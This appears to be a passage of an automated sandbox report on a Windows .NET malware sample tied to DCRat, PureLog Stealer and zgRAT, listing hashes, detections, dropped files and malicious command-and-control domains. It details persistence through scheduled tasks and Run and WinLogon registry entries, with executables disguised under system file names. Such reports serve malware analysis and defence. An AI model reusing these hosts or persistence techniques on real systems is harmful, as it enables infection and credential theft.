http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000001A.00000002.1893613908.00000218E546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240916D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B2069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nuget.org/nuget.exe | powershell.exe, 0000001C.00000002.3275003437.00000280ACA4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3292176472.00000240A152A000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000037.00000003.2168596932.0000029C9D4A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D4F4000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | false | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
https://aka.ms/pscore68 | powershell.exe, 0000001A.00000002.1893613908.00000218E5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240914B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B1E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B912B1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.ecosia.org/newtab/ | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003547000.00000004.00000800.00020000.00000000.sdmp, 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1893613908.00000218E5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240914B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B1E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B912B1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | false | high
https://github.com/Pester/Pester | powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
37.44.238.250 | 306039cm.nyashcrack.top | France | 49434 | HARMONYHOSTING-ASFR | true

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571653
Start date and time: 2024-12-09 15:58:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 56
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 4si9noTBNw.exe (renamed because original name is a hash value)
Original Sample Name: 68ef473852d3aefd8e5e4f2e00b3dfaa.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@48/77@1/2
EGA Information:
• Successful, ratio: 60%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, schtasks.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target conhost.exe, PID 8420 because it is empty
• Execution Graph export aborted for target winlogon.exe, PID 8616 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 4si9noTBNw.exe
Time | Type | Description
09:59:53 | API Interceptor | 170x Sleep call for process: powershell.exe modified
10:00:32 | API Interceptor | 821363x Sleep call for process: 4si9noTBNw.exe modified
10:00:33 | API Interceptor | 2x Sleep call for process: svchost.exe modified
14:59:48 | Task Scheduler | Run new task: VTixufCejPQZEvXiB path: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
14:59:48 | Task Scheduler | Run new task: VTixufCejPQZEvXiBV path: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
14:59:50 | Task Scheduler | Run new task: winlogon path: "C:\Users\Public\AccountPictures\winlogon.exe"
14:59:50 | Task Scheduler | Run new task: winlogonw path: "C:\Users\Public\AccountPictures\winlogon.exe"
14:59:53 | Task Scheduler | Run new task: 4si9noTBNw path: "C:\Users\user\Desktop\4si9noTBNw.exe"
14:59:53 | Task Scheduler | Run new task: 4si9noTBNw4 path: "C:\Users\user\Desktop\4si9noTBNw.exe"
14:59:53 | Task Scheduler | Run new task: conhost path: "C:\Program Files\Windows Defender\en-GB\conhost.exe"
14:59:53 | Task Scheduler | Run new task: conhostc path: "C:\Program Files\Windows Defender\en-GB\conhost.exe"
14:59:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiB "C:\Recovery\VTixufCejPQZEvXiB.exe"
15:00:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\Public\AccountPictures\winlogon.exe"
15:00:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files\Windows Defender\en-GB\conhost.exe"
15:00:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4si9noTBNw "C:\Users\user\Desktop\4si9noTBNw.exe"
15:00:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiB "C:\Recovery\VTixufCejPQZEvXiB.exe"
15:00:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\Public\AccountPictures\winlogon.exe"
15:00:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files\Windows Defender\en-GB\conhost.exe"
15:00:54 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4si9noTBNw "C:\Users\user\Desktop\4si9noTBNw.exe"
15:01:03 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiB "C:\Recovery\VTixufCejPQZEvXiB.exe"
15:01:12 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\Public\AccountPictures\winlogon.exe"
15:01:21 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files\Windows Defender\en-GB\conhost.exe"
15:01:30 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 4si9noTBNw "C:\Users\user\Desktop\4si9noTBNw.exe"
15:01:47 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
15:01:56 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe"
15:02:04 | Autostart | Run: WinLogon Shell "C:\Recovery\VTixufCejPQZEvXiB.exe"
15:02:13 | Autostart | Run: WinLogon Shell "C:\Users\Public\AccountPictures\winlogon.exe"
15:02:22 | Autostart | Run: WinLogon Shell "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37.44.238.250 | Qsi7IgkrWa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
  | 4Awb1u1GcJ.exe | malicious | DCRat, PureLog Stealer, zgRAT | 143840cm.nyashteam.ru/DefaultPublic.php
  | s5duotgoYD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
  | QMT2731i8k.exe | malicious | DCRat | 117813cm.n9shteam.in/ExternalRequest.php
  | EQdhBjQw4G.exe | malicious | DCRat, PureLog Stealer, zgRAT | 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
  | 3AAyq819Vy.exe | malicious | DCRat, PureLog Stealer, zgRAT | 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
  | HcEvQKWAu2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
  | k1iZHyRK6K.exe | malicious | DCRat | 452132cm.n9shteam2.top/Processdownloads.php
  | FuWRu2Mg82.exe | malicious | DCRat, PureLog Stealer, zgRAT | 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
  | cGZV10VyWC.exe | malicious | DCRat, PureLog Stealer, zgRAT | aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
                                                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HARMONYHOSTING-ASFR | Qsi7IgkrWa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
  | 4Awb1u1GcJ.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
  | http://clavity.me | malicious | Unknown | 185.157.247.125
  | s5duotgoYD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
  | QMT2731i8k.exe | malicious | DCRat | 37.44.238.250
  | EQdhBjQw4G.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
  | 3AAyq819Vy.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
  | HcEvQKWAu2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
  | k1iZHyRK6K.exe | malicious | DCRat | 37.44.238.250
  | FuWRu2Mg82.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
                                                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\JzShoUtR.log | eu6OEBpBCI.exe | malicious | DCRat, PureLog Stealer, zgRAT
  | IYXE4Uz61k.exe | malicious | DCRat, PureLog Stealer, Xmrig, zgRAT
  | file.exe | malicious | Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar
  | FToZAUe1tw.exe | malicious | DCRat, PureLog Stealer, zgRAT
  | gorkmTnChA.exe | malicious | DCRat, PureLog Stealer, zgRAT
  | fnNUIS1KeW.exe | malicious | DCRat, PureLog Stealer, zgRAT
  | kqq1aAcVUQ.exe | malicious | DCRat, PureLog Stealer, zgRAT
  | Qsi7IgkrWa.exe | malicious | DCRat, PureLog Stealer, zgRAT
  | A5EbyKyjhV.exe | malicious | DCRat
  | file.exe | malicious | DCRat, PureLog Stealer, zgRAT
Process: C:\Users\user\Desktop\4si9noTBNw.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 211
Entropy (8bit): 5.800440794040198
Encrypted: false
SSDEEP: 3:tqTdNbm39tL+LyaWsQYRzVQc1AHAd3EfqH++GF+IdMuoZHXcWRljDOOtYGiJIPRm:tqPA9tatKg1EiH+Z+IdIsYBDTqGi2PA
MD5: B39A1CDCC601435175F90D068ABE8F74
SHA1: F90E89E7CE69514A04B186C17CB4D37599D8186F
SHA-256: 84499A8ADCF135134601034D63E049A04190E6E5E164801DCB5C0908B715920D
SHA-512: 6D46EB8B24DC27716177E6594BEDA3E85D22FF71C7E9A2D8A787E235F31E1526DF1EBE70277CFAD3E8566687C62F857A76EB7ABB634756092C4D44C4FF2F212C
Malicious: false
Preview: KEP1eq4s1HBSluHZVXXlcC8DaBRzUmXXxrZZbnajlbndDxUqllNBrauIFMadYFYOuof4Vr7s6y9AYeAnqlNsZVpW6RUPM7KgCYsYRaU4ofF3bttkLxww1qzZ8J8EXrf8nc89wlVQRTD3Qw4MhtEZLYpWiTaIbQg69GP8vtykbffim6JLOvgonGxPxmacLNyAwG4Jh5by4d7p2HtmKO4

Process: C:\Users\user\Desktop\4si9noTBNw.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):160
                                                                                              Entropy (8bit):5.621138079844866
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Wq/jXdHWz2iByh/w8m4UHUSGDqJyOnBxxcpOjJzlWlhXLHfpJsllGM54xLwn:ttg2iB67m4mLpHKpO7WlhXrEZ54xUn
                                                                                              MD5:7D73D5FAB40D173CE878A5FE434B91F1
                                                                                              SHA1:3C43CCF319FC021A2D7F679A51B5040D5B7ED846
                                                                                              SHA-256:4486E4C51AA422E56A0D36E366C7A169AD294FE483C5FDB628E175675FFB3850
                                                                                              SHA-512:F5B3A194F33A65AD235688447C6F3FF2D6ADC28D28CF39D505220C4503DC48BC1A825183B7191C1CE4E4EFD92312E158AF309C764128036F896CDDD7D17FAC9D
                                                                                              Malicious:false
                                                                                              Preview:SWYOqfvgB9oSUsuJJHWq3yS6SIP4xB0gtRfiFs9WVNlKjlVCHJtLnfQeDb5hP0sAJIiCMLEaI9UqMHWqwNwoRo2OBAenwbHeekBbDTz6FTDoLkR6FPuCEEsePUAMrbnr2zLlF5ndX0j8lODbthihqEaa2hMsSnOn
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with very long lines (805), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):805
                                                                                              Entropy (8bit):5.9083492739862695
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:BjnuspVGOSXYofGhQtL+QA5DWDfxV+ZpuTXgUX:1usbGdX0hU+QA5iDfxV+fk
                                                                                              MD5:7232B301ECD8F65EA6E763A92327B05D
                                                                                              SHA1:82EAA41187F08121E3A0CD776E482C44EAD3D92C
                                                                                              SHA-256:BD8587A6A27EACAF74F0ABAD9F7DAA680AA93D42646F0302C3A6CED53D2EC611
                                                                                              SHA-512:42A8BD3FE518DDF1DDC17D2DC1D037FB059A2CBCEA200C3FB89CB79F2E258D5C54FFFE00D2B04003B975D5DF8FABA882F41A4DC992FAFAB5FF50071380D28FC4
                                                                                              Malicious:false
                                                                                              Preview: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
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0b9ce8fe, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                              Category:dropped
                                                                                              Size (bytes):1310720
                                                                                              Entropy (8bit):0.42212946737467094
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                              MD5:7D103537742EA9835F052F2D56F2CD9A
                                                                                              SHA1:D57E5FDABBD5787EC4E276FE75CE4B4354EA7DDB
                                                                                              SHA-256:D453A022884A49777A60D266F2EC86A429E97F53DF66920F344EB87F6B13E4F7
                                                                                              SHA-512:0135292D6A22CD525B84434FE86DBEA077E86FCF2C8DF0D4DF21820B309160274F022BDC516549FFA3E650D5AB7CA15FB1C11FC7D0A3B1C54801E2A011B936A4
                                                                                              Malicious:false
                                                                                              Preview:....... .......A.......X\...;...{......................0.!..........{A.!....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{......................................"....|..................r..?"....|%..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with very long lines (992), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):992
                                                                                              Entropy (8bit):5.918147909173836
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:wPKXnFAs7vflSgBeq/QE2xJ8O09/j6Qz7IEr8mDNXlGciFMCygUD6i75Da:wwnJflSjqQxeO09b6UZrbpXlGciFocik
                                                                                              MD5:A8DC2F4C1BB09182FEC5AA1AB28CE02E
                                                                                              SHA1:ABECD85CF120B1562EA405A112F97143CFEE0783
                                                                                              SHA-256:65DC38D6A488A47A6DB4D4D69417CCAB3B7F3DEEF90BBB0BF76EFDE11691E126
                                                                                              SHA-512:8A73AB577907EBD69B7FDA57B79CAD8940E3BC7C67A468C06066CF90D365DD525FCBE34B6EC23A3261FDCE2907E48B087FCCBC3FCDB843F2E558F550AE088EC8
                                                                                              Malicious:false
                                                                                              Preview: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
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
